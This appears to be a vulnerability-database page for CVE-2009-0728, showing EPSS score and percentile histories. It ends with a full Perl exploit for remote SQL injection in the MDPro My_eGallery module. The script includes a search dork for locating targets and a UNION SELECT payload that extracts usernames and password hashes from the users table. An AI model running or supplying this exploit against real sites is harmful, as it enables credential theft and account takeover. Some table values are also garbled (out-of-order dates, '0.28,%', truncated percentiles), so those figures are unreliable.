CVE-2009-0728 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	0.99%	–	–
2022-03-13	–	–	0.99%	–	–
2022-04-03	–	–	0.99%	–	–
2022-05-29	–	–	0.99%	–	–
2022-08-14	–	–	0.99%	–	–
2022-11-13	–	–	0.99%	–	–
2022-11-20	–	–	0.99%	–	–
2022-11-27	–	–	0.99%	–	–
2023-03-05	–	–	0.99%	–	–
2023-03-12	–	–	–	0.07%	–
2023-09-17	–	–	–	0.07%	–
2023-09-24	–	–	–	0.07%	–
2023-10-01	–	–	–	0.07%	–
2023-12-03	–	–	–	0.07%	–
2023-12-17	–	–	–	0.07%	–
2024-01-07	–	–	–	0.07%	–
2024-04-07	–	–	–	0.07%	–
2024-06-02	–	–	–	0.07%	–
2024-07-21	–	–	–	0.07%	–
2024-08-04	–	–	–	0.07%	–
2024-08-11	–	–	–	0.07%	–
2024-11-17	–	–	–	0.07%	–
2025-01-26	–	–	–	0.07%	–
2025-01-19	–	–	–	0.07%	–
2025-01-25	–	–	–	0.07%	–
2025-03-18	–	–	–	–	0.28%
2025-03-30	–	–	–	–	0.28%
2025-04-10	–	–	–	–	0.28%
2025-04-13	–	–	–	–	0.28%
2025-04-15	–	–	–	–	0.28%
2025-04-15	–	–	–	–	0.28,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	18%
2022-03-13	19%
2022-04-03	34%
2022-05-29	35%
2022-08-14	36%
2022-11-13	37%
2022-11-20	36%
2022-11-27	37%
2023-03-05	38%
2023-03-12	28%
2023-09-17	29%
2023-09-24	28%
2023-10-01	29%
2023-12-03	28%
2023-12-17	29%
2024-01-07	28%
2024-04-07	29%
2024-06-02	3%
2024-07-21	31%
2024-08-04	3%
2024-08-11	31%
2024-11-17	32%
2025-01-26	33%
2025-01-19	32%
2025-01-25	33%
2025-03-18	49%
2025-03-30	48%
2025-04-10	49%
2025-04-13	48%
2025-04-15	51%
2025-04-15	51%

#!/usr/bin/perl <<read; MDPro Module My_eGallery Remote SQL Injection Exploit by s3rg3770 && yeat - staker[at]hotmail[dot]it dork: inurl:module=My_eGallery pid note: works regardless of php.ini settings. read use IO::Socket; my ($host,$path,$id) = @ARGV; if (@ARGV != 3) { print "\n+-------------------------------------------------------+\n". "\r| MDPro Module My_eGallery Remote SQL Injection Exploit |\n". "\r+-------------------------------------------------------+\n". "\rby yeat - staker[at]hotmail[dot]it\n". "\nUsage: perl $0 host /path/ id\n". "\nhost: localhost\n". "\rpath: /mdpro/\n". "\rid: 2\n"; exit; } else { my ($packet,$inject,$content); $inject = "index.php?module=My_eGallery&do=showpic&pid=-1". "/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0". ",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7". "230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0". ",0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*"; $socket = new IO::Socket::INET( PeerAddr => $host, PeerPort => 80, Proto => 'tcp' ) or die $!; $packet .= "GET /$inject HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "User-Agent: Lynx (textmode)\r\n"; $packet .= "Connection: close\r\n\r\n"; $socket->send($packet); while (<$socket>) { $content .= $_; } close($socket); if ($content =~ /<r0x>(.+?)<r0x>/i) { print "Exploit Successful: $1\n"; } else { print "Exploit Failed.\n"; } } # milw0rm.com [2009-02-23]